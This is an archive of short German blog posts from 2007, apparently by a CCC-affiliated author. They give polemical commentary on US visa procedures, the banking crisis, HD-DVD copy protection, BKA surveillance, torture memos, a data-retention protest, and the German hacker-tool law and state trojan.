Dieses Mal muss ich durch eine degradierende Webseite, wo man erst mal 10 Dollar per Kreditkarte zahlen muss, dafür dass sie einem einen Termin im Konsulat geben (alternativ kann man eine 0900-Nummer anrufen, die einen auch kräftig zur Kasse bittet, um einen Termin zu kriegen). Auf dem Webserver muss man dann diverse Formulare ausfüllen, unterwegs wirft die Webseite noch einen Java-Stacktrace wegen Oracle-Fehlern im Backend, und bei mir hat er noch die Kreditkarte nicht annehmen wollen. Zu guter Letzt generiert die Webseite dann ein PDF, das man ausdrucken soll, und wo er die eingegebenen Daten falsch einträgt.
Dann muss man zu einer kleine Allianz-Tochter (mit der besonders vertrauenswürdigen Geschäftsform OHG) gehen und denen 80 Euro überweisen (Kreditkarte? Kontoeinzug? Geht nicht!), die emailen einem dann ein Stück Papier, das man ausdruckt und dem Konsulat mitbringt. Vor Ort zahlen geht offenbar nicht mehr, auch nicht in bar. Wieso sie, wenn sie auf ihrer Webseite schon für die 10 Dollar Kreditkarten nehmen, nicht auch die 80 Dollar über die Kreditkarte nehmen, bleibt unklar. Mit dem Allianz-Dingens gibt es dann noch Probleme, weil deren Bank erst mal drei Tage auf dem Geld sass, und weil der Mailserver der die Bestätigungsmail abgebenden Domain keine SMTP-Verbindungen annahm (dann nimmt mein Mailserver die Mails nicht an). Kurz gesagt: ein einziges Desaster.
Viel deutlicher als mit diesem Generve können einem die Amis im Grunde nicht sagen, dass sie einen nicht zu Besuch haben wollen. Ihr könnt euch also vor stellen, wie überraschend ich das jetzt finde, dass denen die Besucher wegbleiben. Oh und von der Passagierdatenweitergabe will ich mal gar nicht anfangen. Im Übrigen hatte ich auch mal Gelegenheit, die Gastfreundschaft der US-Immigrationsbehörden am Flughafen zu erleben, als die mich über eine Stunde befragt haben und dann mit einem Gummihandschuh durch die Unterwäsche in meinem Gepäck gingen.
Der Lacher ist: zum Camp hatte ich ein paar Freunde aus Amerika zu besuch, und die meinten: die Einreise in der EU sei weniger Stress gewesen als die Ausreise aus den USA. Way to go, Chertoff.

Fri Nov 2 2007

[l] Bankendomino: Der Fed pumpt noch mal 41 Milliarden Dollar frisch gedrucktes Bargeld in das Finanzsystem.
Citi (die Größte Bank der Welt) wurde gerade runtergerated, weil sie nach Ansicht von Analysten eine zu dünne Kapitaldecke haben, wenn sie nur 2,8% ihrer Einlagen als Cash vorliegen haben, der US-Durchschnitt liegt bei 5%. Schon das ist ja im Grunde eine Lachnummer.
Und zu allem Überfluß ist der kanadische Dollar jetzt 1,06 US-Dollar wert, das freut mich persönlich ja sehr, denn die Amis haben sich seit Jahrzehnten immer über die Kanadier lustig gemacht, weil deren "kommunistisches Gesundheitssystem" und ihr "wertloses Geld" ja zeigten, was das für ein wertloses Land ist. Und jetzt haben die nicht nur ein besseres Gesundheitssystem, sie haben auch die wertvollere Währung :-)

Wed Oct 31 2007

[l] Zeit für einen Technologie-Darwin-Award: Die erste HD-DVD mit die Analogausgabe abschaltendem "Kopierschutz"-Flag ist aufgetaucht, Resident Evil. Das ist natürlich eine absolute Frechheit und ein Schuß mit dem Minenwerfer ins eigene Knie. Das heißt u.a., dass die HD-DVD nicht auf der Xbox 360 ohne HDMI nicht in HD abgespielt werden kann. Damit schließen sie 80% des Player-Marktes aus.
Nun könnte man sich generell fragen, wer denn bitte auf die unglaublich bescheuerte Idee kommt, so ein Flag überhaupt einzuführen. Und die Überraschung ist: sie wissen, was für eine Schweinerei das ist, und wollten das daher erst ab 2010 benutzen, wenn sie den Markt schon saturiert haben. Denn jetzt werden die Leute natürlich sehen, was für eine Abzocke und Verarsche dieser ganze HD-Unfug ist und nicht mehr in Geräte und HD-DVDs investieren. Und Blu-Ray ist keinen Deut besser.
Der lustige Teil an der ganzen Sache ist, dass das die Piraten natürlich überhaupt nicht betrifft, die werden das nicht mal merken. Die ziehen sich weiterhin ihren Rip aus dem Internet und gucken das auf allen Endgeräten, auf die sie gerade Bock haben.
Insofern: herzlichen Glückwunsch, Microsoft. Das habt ihr prima gemacht. Schöner "Kopierschutz". (Danke, Martin)

Mon Oct 29 2007

[l] Ihr lest hoffentlich auch alle weiter das "Annalist"-Blog, ja? Da ist heute von dem Akteninhalt die Rede, und das ist mal wieder ganz furchtbar, wenn auch irgendwie nicht unerwartet. Aber es ist doch etwas anderes, wenn man vorher davon ausgeht, dass die eh alle ihre Daten direkt an den Staat weiterreichen, und die Namen der "Geschäftspartner" dann schwarz auf weiss zu sehen.
Auf jeden Fall ist es so, dass wir schwarz auf weiß haben, dass die Überwachung stattfindet. Wir wissen, dass die Telefonate abgehört werden, weil die Protokolle der Gespräche in den Akten stehen. Genauso die Videokameras vor und hinter dem Haus. Es gibt jede Menge Fotos in den Akten, von uns, unserer Familie, von Bekannten und Unbeteiligten. Diese Fotos werden anscheinend in James-Bond-Manier auf der Straße gemacht, denn das Fotografiert-Werden ist nicht wahrnehmbar, die Ergebnisse schon. Genauso wissen wir, dass die Internet- und Telefonunternehmen die Daten zur Verfügung gestellt haben (bis auf Alice, die das erst ab Januar können und für alles vorher soviel Geld haben wollten, dass es selbst dem BKA zu teuer war). Und die Bahn die Bahncard-Daten zu den Reisen, die wir gemacht haben, usw.
Also so eine gewisse morbide Neugierde habe ich da ja auch, wie weit die da gehen. Der Foebud und der CCC sagen ja schon lange, dass man von Kundenkarten die Finger lassen soll, weil sonst Daten mit Missbrauchspotential anfallen, aber für die Bahncard gilt natürlich das gleiche. Ich frage mich: lassen die sich auch vom Super- und Baumarkt den Bon kopieren, um zu gucken, ob da jemand Bombenbastel-Materialien kauft?
Und … Fotos auf der Strasse. Also echt mal. Was für armselige Gestalten machen denn sowas bitte. Das fühlt man doch, dass das gerade unter aller Sau ist, was man da macht. Wie kann jemand sowas beruflich machen? Oder Telefon-Abhören. Wie schlafen solche Menschen nachts? Ich habe für sowas nicht mal mehr Mitleid übrig, nur noch Abscheu.
Ich könnte auch nur kotzen, wenn sich unsere Würdenträger über die DDR als Unrechtsstaat aufregen, und dann ziehen wir selber sowas durch. Ja, irgendwie muss die Polizei Verbrecher überführen können, ist mir auch klar, aber tut mir leid, ich finde das alles ausgesprochen unmoralisch und hätte gerne eine Gesellschaft, wo so etwas nicht nötig und nicht möglich ist.
Jedenfalls… *lufthol* ich wünsche Andrej und Familie alles Gute und hoffe, dass sie irgendwann mal in Ruhe ihr Leben führen können, und dass wir als Gesellschaft uns irgendwann durchringen können, Polizisten, Staatsanwälte und Richter auch einfach mal direkt ohne Rentenansprüche fristlos zu entlassen, wenn sie so eine Aktion durchziehen. Im Moment hat das ja selbst nach dem BGH-Urteil keinerlei Auswirkungen für unsere Junta. Da muss genau niemand auch nur um seine nächste Gehaltserhöhung fürchten. Und DAS, liebe Leser, ist in meinen Augen der eigentliche Skandal. Da darf man sich über Willkür nicht wundern.
Oh, und klickt auch auf die Geschichten drauf, da steht jeweils noch mehr Text hinter :-)

Tue Oct 23 2007

[l] Ich habe noch ein cooles Beispiel gemailt bekommen, was Hacken ist: Auf einer Demo-Party über eine besondere Sound-Datei ein Oszilloskop als Display benutzen. SEHR cooler Hack! (Danke, Jonas)

Mon Oct 22 2007

[l] Wer sich gefragt hat, wieso die Telcos sofort beim NSA-Schnüffeln mitgemacht haben: das ist ein Profit Center; Comcast nimmt $1000 für die Installation der Saugrüssels und dann $750 pro Monat. Das lohnt sich ja deutlich mehr als das ISP-Business.

Sun Oct 21 2007

[l] Ich bin ja immer wieder erschüttert, wie sehr die ganzen Kampflieder der Linken von früher heute noch aktuell sind, ja immer aktueller werden. Die Klassengesellschaft ist heute getrennter als je zuvor, denn früher heirateten die Reichen auch schon mal Partner aus niedrigeren Klassen, das ist heute verpönter als früher. Ich finde gerade die URL nicht mehr, wo ich da neulich einen Bericht zu gelesen hatte.
Die Gewerkschaften waren mal DIE Errungenschaft der Arbeiterklasse gegen den Staat. Heute haben wir zu viele Arbeiter für zu wenige Jobs, und daher ist Streik kaum noch eine Bedrohung, weil es genug genug Temp-Arbeiter gibt, zur Not aus dem Osten, mit denen man alles mögliche überbrücken kann. Mehr noch als früher denken die Leute alle nur noch an sich selber.
Wie komm ich drauf? Dieses Youtube-Video, Georg Kreisler und Barbara Peters, von 1985. Das Audio ist von 1985, als Video hat jemand eine Art Karaoke-Darstellung gemacht. Das Lied hat so den Hauch der ewiggestrigen Altkommunisten, aber ich finde es aktueller als je zuvor.
Update: Der Link war http://www.zeit.de/2007/35/Aufsteiger?page=all, danke an die ganzen Zeit-Leser, die ihn mir noch mal gemailt haben!

Sat Oct 20 2007

[l] Die Frist für Vorträge für den CCC Congress ist gerade abgelaufen, aber offenbar sind noch alle vom Camp völlig verbraucht, jedenfalls haben wir weniger Vorträge als die letzten Jahre. Dazu kam, dass zwischendurch das Pentabarf (das Web-Tool, wo man seine Vorträge einträgt) kaputt ging. Wenn also noch jemand überlegt hat, ob er diesen einen Kracher-Vortrag, den er gerade fertig gemacht hat, nicht auf dem Congress halten will: versucht euer Glück noch schnell und tragt euch ein.

Thu Oct 18 2007

[l] Au weia. AU WEIA. Die Frau von dem "Terroristen-Andrej" hat auch ein Blog, wo sie berichtet, wie das ist, wenn man vom BKA verfolgt wird. Nicht nur werden sie komplett abgehört, sondern die lassen sie auch wissen, dass sie abgehört werden: die Eltern rufen an, und landen plötzlich als Zuhörer in einem anderen Gespräch, das Andrej gerade mit ein paar Kumpels von der Linkspartei führt. Anrufe von ihnen zu ihren Eltern kommen mysteriös nicht durch. Ihr Computer stürzte ständig unklar ab. Ihr Handy kann sich mysteriös nicht sauber einbuchen. Das liest sich echt übel. Mein Mitleid haben die jedenfalls. Krasse Scheiße.
Ich habe mir ja immer am meisten Sorgen gemacht, dass sich mein Verhalten ändert, wenn ich befürchten muss, überwacht zu werden, und dass ich daher meine Rechte nicht mehr wahrnehmen würde. Das ist ja auch die Hauptbeschwerde in dem Verfahren vor dem Verfassungsgericht gewesen. Aber das ist ja noch mal eine Ecke krasser, weil den Leuten ja ständig direkt ihre Ohnmacht vorgeführt wird, und sie und unbeteiligte Dritte geradezu damit terrorisiert werden, dass sie sich bei den falschen Leuten unbeliebt gemacht haben. Das ist echt menschenunwürdig. Ich schäme mich, das in meinem Land so eine Schweinerei passieren kann.
Ich versuche da die ganze Zeit die richtigen Worte zu finden, aber es will mir nicht gelingen. Für mich hört sich das an wie die Horrorbeschreibungen der Stasi, aus der Ferne der Sicherheit von West-Berlin aus gesehen. Man hat das mit erschütterter Faszination beobachtet, und war froh, dass das in unserem Land nicht passieren kann. Und jetzt passiert das in unserem Land. Das klingt wie ich mir Russland unter Stalin vorgestellt habe. Erst versuchen sie dich verschwinden zu lassen, und wenn das nicht gelingt, machen sie es zu ihrer persönlichen Lebensaufgabe, dir den Rest deines Lebens zur Hölle zu machen.
Guckt euch nur mal das hier an:
Kleine Schikanen am Rande: einem Beschuldigten wurde gerade ohne Angabe von Gründen das Giro-Konto von der Bank gekündigt, einem anderen unvermittelt der Mietvertrag nicht verlängert. Bei uns kommt weiterhin täglich vor, dass, wer Andrej anruft, meine Mailbox erreicht.
Na kein Wunder, dass die Staatsanwältin da von Verdunkelungsgefahr ausgeht, wer will denn unter solchen Bedingungen in Deutschland weiter leben bleiben?!
Vor allem, überlegt euch mal, was das für armselige Menschen sein müssen, die Schergen des BKA an der Stelle. Ob das ein Raum sexuell frustrierter Verlierer mit Minderwertigkeitskomplexen sind, die anders keinen mehr hoch kriegen? Das Niedermachen anderer soll ja eine mächtige Triebbefriedigung sein. Vielleicht sollten wir mal zusammen legen und dem BKA ein paar Stripper vorbei schicken. (Danke, Norbert)

Sun Oct 14 2007

[l] Au weia: Ralph Nader erklärt, wieso die Demokraten den Bush nicht anklagen. Ralph Nader ist eine sehr schillernde Figur, der sich als Präsidentschaftskandidat für die Grünen (die in den USA so gut wie unbekannt sind und politisch keine Rolle spielen) aufstellen ließ, und so den Demokraten Stimmen abgezwackt hat, weshalb ihm gerne der Vorwurf gemacht wird, ohne ihn hätte Al Gore gewonnen. Ist natürlich Unfug, denn Al Gore hat gewonnen. Aber Verschwörungstheorien sind mächtig, und daher haben ihm am Ende die Republikaner Steine aus dem Weg geräumt, damit er sich zur Wahl stellen kann, in der Hoffnung, dass genau diese Verschwörungstheorie kommen würde, wenn sie "gewinnen".
Ursprünglich ist Ralph Nader ein Anwalt, und seine wichtigste Tat ist, dass wir ihm den Sicherheitsgurt im Auto zu verdanken haben. Er hat sich mit Ford und GM angelegt und am Ende gewonnen. Es gibt dazu einen schönen Film namens "An Unreasonable Man", gibt es bestimmt auch auf Youtube oder Google Video oder so. Was ich sagen will: der Mann ist kein Crackpot.

Sat Oct 6 2007

[l] Ich überlege gerade, ob ich mir mal einen kleinen Embedded PC bauen soll. Ich hatte mal einen, das war ein VIA EPIA System, und an sich war ich damit ganz zufrieden, bis es einem umgekippten Glas Orangensaft zum Opfer fiel. Heute sind aber meine Ansprüche gewachsen. Ich brauche mindestens ein Gigabit Ethernet und einen zweiten Port für DSL, der kann ruhig 100baseTX sein, ich brauche mindestens einen PCI-Slot, eher zwei, und ich brauche IDE- und SATA-Ports. PCI Express wäre mir egal, USB würde nicht schaden, aber ist auch nicht wichtig. Und wenn ich schon mal sowas bauen will, dann kann ich mich bei der Gelegenheit auch mal von x86 trennen und eine der anderen Architekturen anschaffen, z.B. gibt es von Raza diverse MIPS-Designs. Das Gerät soll am Ende im Großen und Ganzen ein NAS werden, aber es soll auch gleich DSL für mich machen, und ich will da meine DVB-Karte reinstecken, damit der dann TV aufnehmen kann. Das ist alles an sich kein großes Problem, nur habe ich den Anspruch, dann da auch die Performance rauszukriegen, die heute möglich ist. Die ganzen Plaste-NAS-Systeme da draußen kriegen selbst über Gigabit nicht mal 20 MB/sec Durchsatz hin, wenn ich das richtig sehe. Das kommt ja überhaupt gar nicht in Frage.
Daher jetzt hier der Aufruf an die Bastler. Wer hat sowas auch schon mal gemacht? Welche Hardware kommt in Frage? Hier gibt es eine Übersicht der Plaste-Consumer-Geräte, auf denen Leute schon Linux aufgespielt haben.
CPU-Performance wäre mir weitgehend wurscht, solange ich das Gigabit Ethernet saturiert kriege, wenn die Daten im Buffer Cache waren. Aber wenn es so nen Quad Core 2 GHz MIPS64 für nen Appel und nen Ei irgendwo gäbe, würde ich auch nicht nein sagen :-)

Thu Oct 4 2007

[l] Alberto "I do not recall" Gonzales hat Anfang 2005 ein Foltermemo rumgeschickt, dass selbst übelste Foltermaßnahmen gutheißt. Ende 2004 hatten sie noch eine fette "wir foltern nicht" PR-Kampagne gemacht.
Physisch und psychisch schmerzhafte Verhörmethoden wie Schläge gegen die Köpfe von Terrorverdächtigen waren ausdrücklich genehmigt. Ebenso durfte simuliert werden, der Verdächtige werde ertränkt, sollte er nicht reden. Auch war es erlaubt, Inhaftierte in heruntergekühlten Räumen zu halten.
Gonzales ließ sich von seinem völkerrechtswidrigen Weg durch nichts abbringen. Er trieb seine Politik gegen die Bedenken seines Stellvertreters James Comey voran. Der Vize äußerte gegenüber Kollegen im Ministerium seine Befürchtung, sie müssten sich alle schämen, wenn die Welt einmal davon erführe. Nach einer Auseinandersetzung mit dem Weißen Haus musste Comey sein Amt aufgeben.
Peinlich, peinlich, aber auch eine tolle Gelegenheit für die Pressesprecher, mal so richtig zu zeigen, wie kognitive Dissonanz in der Praxis aussieht:
Regierungssprecher Tony Fratto verweigerte jeglichen Kommentar zum Thema Verhörmethoden. Er wies lediglich darauf hin, dass die Regierung viel getan habe, damit die Ermittler auf der Grundlage des amerikanischen und internationalen Rechts handelten.
Aha. Soso. Like what? Auch die Pressesprecherin des Weißen Hauses scheitert an dieser Aufgabe:
White House spokeswoman Dana Perino Thursday said the United States does not use torture and that it is U.S. policy not to do so. She added that it is possible that reasonable people could disagree on opinions regarding "complex…unique and novel" questions.
Bwahahaha, *fasel* Der Satz bringt die Bush-Junta echt auf den Punkt. Klar, wir sind nicht ihrer Meinung. Global Warming gibt es nicht, Jesus ist unser Retter, Iran ist der Sitz des Bösen, und im Übrigen kann man ja wohl mal anderer Meinung sein, ob auf den Kopf schlagen oder Waterboarding was mit Gewalt zu tun hat. Ich finde ja: einmal das gesamte Kabinett für jeweils ne Stunde waterboarden. Dann Congress, dann den Senat. Und dann die alle gesammelt als Grenadier-Batallion im Irak stationieren. Das sind lauter alte Säcke, denen überhaupt nicht klar ist, was sie da eigentlich tun. Die müssen das mal aus der Nähe erleben.

Sat Sep 22 2007

[l] Oh Mann, die Demo hat gerockt. Ich befürchtete ja, daß da nur ein paar Gestalten kommen würden, aber am Ende waren wir nach Zählung der Ordner 15.000 Menschen. Und mit vielen richtig coolen Transparenten! Ich selbst lief mit dem Transparent unten mitte herum, "Dieses Mal stoppen wir sie VOR dem Reichstagsbrand", und habe damit offenbar auch den Nerv der Zeit ganz gut getroffen, jedenfalls haben sich da viele Leute drüber gefreut, als sie es sahen. Ich habe einen Haufen Fotos gemacht und schaue mal, daß ich die noch geuploaded kriege.
Ich hatte ja ein bißchen Angst, daß da der Schwarze Block auftauchen und randalieren könnte, und damit die Sache in Verruf bringen könnte, und tatsächlich tauchten sie auf, und wurden prompt von der Polizei in Randale-Schutzanzügen eingekesselt und die ganze Demo lang begleitet. Später gab es dann da auch noch Gerangel oder härteres; einer sprach von 15 Verletzten Demonstranten, die völlig friedlich und ohne Provokation von den fiesen Polizisten drangsaliert und mit chemischen Kampfstoffen (Pfefferspray) mißhandelt worden seien, aber, äh, … naja. Ich warte mal auf neutrale Berichterstattung. Ich habe nur gesehen, wie da plötzlich ein Pulk Polizisten am Rande des Blocks rumtänzelten, als müssten sie etwas auf dem Boden liegenden ausweichen. Vielleicht will da noch mal jemand berichten, der das auch wirklich gesehen hat, was da genau passiert ist.
Ansonsten ist die Demo am Ende von allen möglichen Gruppierungen vereinnahmt worden, u.a. auch Ver.di (deren Journalisten-Union zumindest), der evangelischen Telefonseelsorge, die Hedonistische Internationale ist mitmarschiert (und, so kritisch ich denen bisher gegenüberstand, deren Streitkultur hat mich überzeugt; deren Anführer hat da einen flammende Kampfrede geschwungen, die richtig gut war), lauter Altlinke, diverse Parteien (Linkspartei, Grüne und FDP zumindest)… ich habe ein tolles Foto, wo man die Spartakisten und die FDP nebeneinander marschieren sieht. Das hätte ich auch nicht gedacht, daß ich das mal sehen würde. Dann waren da noch Leute von der Freien Ärzteschaft, die das auch gleich genutzt haben, um gegen die Gesundheitskarte und was sie sonst noch so zwickt (gedeckelte Finanzierung von Gesundheitsleistungen) zu meckern. Kurz: grandiose Veranstaltung. Das Wetter hat auch toll mitgemacht. War prima.
Update: Ich bin in der Berlin Abendschau, und sie halten lange genug drauf, daß man das Schild in Ruhe lesen kann. Juchuu! :-)

Fri Sep 21 2007

[l] Wollte ich ja immer mal machen, jetzt hat es endlich jemand anderes gemacht und mir die Arbeit erspart: Der Terror-Katalog, was für furchtbare Sicherheitsgesetze wir schon gekriegt haben seit 2001. Da müsste man aus Vollständigkeitsgründen auch noch die später mißbrauchten Sicherheits-Übeltaten von früher dazu ziehen, Rasterfahndung, großer Lauschangriff, Kronzeugenregelung, Mautdaten. Und ein bißchen mehr Kritik hätte ich mir auch gewünscht, so z.B. auf Seite 9:
Um die Maßnahmen gegen den Terrorismus zu finanzieren, wurden die Tabak- und die Versicherungssteuer erhöht. Die erwarteten Mehreinnahmen von drei Milliarden Euro sind zur Hälfte für die Bundeswehr bestimmt.
Erst mal: zur Hälfte? Die andere Hälfte stopft irgendwelche anderen Löcher, oder wie? Was können die Raucher oder Versicherungen dafür? "Kritik: Keine" finde ich an der Stelle nicht in Ordnung.
[l] Kennen ja vermutlich schon wieder alle: abmahnr^JURA, Web 2.0 meets Abmahnunwesen. Danke an die vielen Leute, die mir das gemailt haben. Steter Tropfen höhlt den Stein :-)

Mon Sep 17 2007

[l] Der Irak will Blackwater rauskicken. Offizieller Grund ist eine Schießerei, bei der acht Iraker erschossen und 13 verletzt wurden. Da war vermutlich einer der Neffe des Präsidenten oder so, denn Blackwater hat schon SO viele Leute im Irak erschossen, die 8 hätten den Kohl jetzt nicht fett gemacht.

Wed Sep 12 2007

[l] W00t! Gravenreuth zu 6 Monaten Gefängnis ohne Bewährung verurteilt. Money Quote:
"Nur weil die taz einen Anwalt hatte, der Ihnen in den Arm gefallen ist, haben Sie die Domain nicht verwertet. Die Allgemeinheit muss vor Ihnen geschützt werden."
Sie sähe - so die Richterin Nissing - keinen Anhaltspunkt dafür, dass sich der Angeklagte zukünftig an die Rechtsordnung halten werde. Im Januar ist Gravenreuth bereits zu einer Haftstrafe auf Bewährung -wenn auch nicht rechtskräftig - verurteilt worden, weil er Mandantengelder nicht ausgezahlt hat. In der Hauptverhandlung kam zur Sprache, dass es wegen eines ähnlichen Deliktes eine weitere Anklage in München gibt.
Heise hat natürlich auch eine Meldung dazu und noch NIE in der Geschichte der Heise-Foren gab es so viel Freude auf einem Haufen bei einem Artikel :-)
Sogar die Süddeutsche freut sich und schreibt auf Seite 2:
Rechtsanwalt Gravenreuth ist in der deutschen IT-Szene wegen zahlreicher Abmahnungen berühmt und berüchtigt. In den neunziger Jahren tat er sich dadurch hervor, dass er und seine Mitarbeiter unter dem Pseudonym "Tanja Nolte-Berndel" auf private Kleinanzeigen in Computerzeitschriften antworteten. Ging ein so Angeschriebener auf die Bitte um Software-Tausch des angeblichen Teenagers ein, wurde dieser wegen Verstoßes gegen das Urheberrecht abgemahnt oder auch angezeigt. Ein weiterer Schwerpunkt seiner Tätigkeit waren Serien-Abmahnungen im Bereich des Markenrechts.
Das Urteil ist laut Golem nicht rechtskräftig und er kann auch noch in Berufung gehen. Wird er natürlich machen, aber ich finde, heute ist trotzdem ein Feiertag. *korkenknall*

Mon Sep 10 2007

[l] Ich poste ja Apple-Sachen grundsätzlich nur für Nicht-Apple-User, weil Apple-User damit überfordert sind, sich mit den Fakten im Universum zu befassen, insbesondere wenn es mit ihrem Selbstbild als intelligente Verbraucher kollidiert. In diesem Sinne: Apple verkackt mal wieder auf ganzer Linie. Stellt sich raus, dass das Iphone auch wenn es ausgeschaltet ist die Email updated, und so im Ausland immense Roaming-Gebühren erzeugt. In diesem Fall $4800 für einen Ami, der eine Kreuzfahrt im Mittelmeer gemacht hat.
Apple spokeswoman Natalie Kerris points out in its terms and conditions that it will cost an arm an a leg to use an Iphone out of the US even if no services are intentionally used.
Aber Recht haben sie. Sowas kann man echt nur mit Apple-Usern abziehen. Wieso soll sich nur Apple an diesen Leuten sanieren, AT&T kann die Kohle auch gut brauchen.

Sun Sep 9 2007

[l] Frankreich reiht sich in die Liste der China-Trojaner-Opfer ein. Ich glaube ja, China wird jetzt bei Computer-Angriffen sowas wie Al Kaida bei Terroristen. Denn das ist gar nicht so einfach, einem Trojaner anzusehen, daß er aus China kommt, wenn die Chinesen da nicht ganz grobe Fehler gemacht haben. Ich denke, ab jetzt behauptet man einfach, das sein China gewesen, wenn man angegriffen wird. Dann erspart man sich langwierige Erklärungen.

Fri Sep 7 2007

[l] Au weia. Achtung: jetzt kommt wirklich krass üble Agitprop-Gülle direkt aus den finstersten Hirnwindungen der gleichgeschalteten PR-Presse: "Täuschen, tarnen, tricksen" in der Süddeutschen. Das ist nichts für schwache Nerven, nicht auf leeren Magen zu sich nehmen.
Die Männer der Terrorgruppe Islamic Jihad Union, die in Deutschland vermutlich mindestens fünf Autobomben hochgehen lassen wollten, haben mit allen Tricks versucht, Polizei und Geheimdienste abzuschütteln.
Soso, "vermutlich mindestens fünf Autobomben". Drei Hartz IV Empfänger. Wo haben die 5 Autos her? Und was für Geheimdienste?
So unternahmen die Verdächtigen oft Rundgänge um ihre Wohnungen, um mögliche Fahndungsfahrzeuge zu entdecken. Einer der mutmaßlichen Terroristen ging voraus, ein anderer folgte in einigem Abstand, um Bewegungen von Polizisten mitzukriegen.
Mann Mann Mann, das sind ja gewiefte Kriminelle. Also auf sowas muss man erst mal kommen. Ums Haus sind die gelaufen! Oh Mann! Also dagegen können 300 Beamte natürlich nicht anstinken.
Wenn die Verdächtigen im Auto saßen und sicherstellen wollten, dass sie nicht verfolgt werden, beschleunigten sie auf Ausfallstraßen plötzlich auf Tempo 200 oder überfuhren rote Ampeln. Und einmal sprang der inzwischen festgenommene Daniel S. aus dem Saarländischen im letzten Augenblick aus einem abfahrenden Zug, lief über die Gleise und stieg dort in einen anderen Zug. Die Polizisten konnten nicht folgen, ohne selbst entdeckt zu werden.
Mir fehlen die Worte. Völlig unmöglich, solche Leute zu verfolgen. Bei Rot über die Ampel gefahren! Nein, solche Barbaren kann man nicht verfolgen, das sieht ja wohl jeder sofort ein. Und so ein Auto ist dann natürlich weg, außer die haben einen GPS-Peilsender installiert, was heute schon bei G8-Protestierern gemacht wird, von denen offensichtlich keinerlei Gefahr ausgeht. Aber hey, wenn jemand aus dem Terrorcamp in Pakistan in Deutschland Autobomben baut, für solche Fälle haben sie keine GPS-Wanzen übrig, denn die waren alle bei den G8-Gegnern verbaut. Oder so. Und die Bahn-Nummer, tja, die Bahn ist nicht verfolgbar. Klar hätte man einen anderen Polizisten zum nächsten Bahnhof schicken können, aber hey, das hilft auch nicht, wenn der Terrorist zwischendurch die Notbremse zieht, aus dem Zug hüpft oder sich von Scotty rausbeamen läßt!1!!
Auch technisch versuchten die Täter sich zu tarnen. Nach Informationen der SZ kommunizierten die Verdächtigen unter den IP-Adressen unbescholtener Bürger miteinander. Sie drangen dafür in offene, ungeschützte Wireless-Lan-Netze ein und benutzten dann zur Tarnung die IP-Adressen (individuelle Nummern für jeden Internet-Zugang), um ihre Führungsleute in Pakistan zu erreichen.
Habt ihr gehört, ihr unbescholtenen Bürger? Macht sofort eure WLANs zu!1!! Sonst kann man hier im Lande noch anonym kommunizieren, und wo kämen wir da hin. Ohne Totalüberwachung können wir hier keine Sicherheit herbeiführen.
Der Brüller: das haben natürlich nicht unsere großartigen Ermittler herausgefunden, sondern die Amis haben ihnen ein paar Echelon-Mitschnitte gegeben.
Amerikanischen Ermittlern, die vor allem die Kommunikation von und nach Pakistan im Blick haben, fielen diese E-Mails im Herbst 2006 erstmals auf. […] Wie die Amerikaner an ihre Informationen gekommen waren, teilten sie den Deutschen nicht mit — das ist nicht üblich im internationalen Geheimdienstgeschäft.
Nein, wirklich? Bwahahahaha. Also, mal zusammengefaßt. Die Amis lesen offensichtlich unsere Email komplett mit. Und die tollen Terroristen haben ihre Emails unverschlüsselt verschickt, die Deppen.
Das fandet ihr schon alle schlimm? Wartet mal, der eigentlich Kracher kommt noch.
Zu dem Zeitpunkt, als die mutmaßlichen Täter ihre zwölf gehorteten Fässer mit Wasserstoffperoxid aus dem Versteck holen und mit der Herstellung von Sprengstoff beginnen wollten, spielten sie ein Verschlüsselungsprogramm auf einen ihrer Computer. "Da wurden wir blind", sagt ein Fahnder der SZ. "Da hätte uns ein Trojaner geholfen, um da einzudringen."
Tataaaaaaa! *Tusch*
Da möchte ich doch mit dem Kopf gegen die Wand schlagen, wenn ich das lese. Aber wartet, das könnte noch jemand nicht verstanden haben, diese subtile Botschaft.
Denn dass die Täter durch ihre Verschlüsselungsaktion der Polizei die Augen vernebelten, wird, wenn es zum Prozess kommt, vor Gericht eine Rolle spielen — und die Angeklagten, ihre Hintermänner und mögliche Nachahmer werden daraus lernen, wie sie sich am besten schützen können. "Wir werden blind und taub, wenn wir hier nicht mithalten", sagt ein hoher Sicherheitsverantwortlicher.
Na, schon mal so viel Desinformation auf einem Haufen gelesen in Deutschen Medien? Und die Süddeutsche fing gerade an, Anzeichen von seriösem Journalismus zu zeigen. Mann Mann Mann.
Sicherheitsexperten bemängeln, dass sie noch nicht einmal die Telefonate abhören dürfen, die aus den Terrorcamps in Pakistan nach Deutschland gehen.
Was für eine DREISTE Lüge. Echt, so eine Schweinerei. Ich könnt echt nur noch kübelweise kotzen. Es ist nicht Aufgabe des BKA, Terrorcamps in Pakistan zu überwachen. Das macht der BND. Der hört dann auch den Anruf ab und sagt dem BKA Bescheid, und die gehen dann zum Richter und beantragen eine TKÜ für die angerufene Nummer. Umgekehrt kann das BKA dem BND sagen, welche Zielnummern im Ausland sie abgehört haben wollen. Das eigentliche Problem ist, daß das Terrorcamp in Pakistan nicht über Festnetz mit Caller-ID anruft, sondern über Skype Call-Out, d.h. der Telefonanruf geht dann hier bei Skype in Deutschland los. Aber hey, Skype arbeitet selbstverständlich auch mit den Behörden zusammen, es ist keinesfalls so, daß man da einen Trojaner bräuchte, um Skype abzuhören. Das sagen sie nur, damit die dumme Bevölkerung ihnen abnimmt, daß man Trojaner braucht.

Thu Sep 6 2007

[l] Ein US-Richter streicht den Teil des Patriot Act, nach dem es keinen Richtervorbehalt für das Einsehen von Userdaten bei ISPs gibt. Damit haben die USA jetzt mehr Rechtsstaat, Bürgerrechte und Datenschutz als SSchäubles BKA-Ermächtigungsgesetz bei uns übrig läßt. Wer hat den noch mal zum Innenminister gemacht?

Fri Aug 31 2007

[l] OK, bin zurück aus dem Bundestag. Oh Mann.
Also da kamen so Ansichten zu Tage wie daß das Hackertoolverbot ja gut sei, weil man ja Hacken schon verbieten müsse, das sei ja gefährlich. Als ich dann erläuterte, daß das Hacken schon vorher verboten war, und das Hackertoolverbot bloß legitime Arbeit und Forschung verhindert und meiner Firma den Nachwuchs entzieht, da hieß es dann "naja aber der Tauss war da ja dagegen". Ich wollte dann wissen, wieso nur der Tauss und drei andere dagegen gestimmt haben und der Rest der SPD dafür, da kam dann nur noch die Ansage, das sei halt alles nicht so einfach.
Zu dem Bundestrojaner meinte sie dann noch, es gäbe ja auch ansonsten total viele Trojaner, und da sollten wir doch auch mal vor warnen, das sei ja eine viel größere Bedrohung.
Am Ende kam dann noch der Vorschlag, ich möge doch der SPD beitreten. Das bringt zwar auch nicht viel, aber da könnte ich mich dann einbringen.
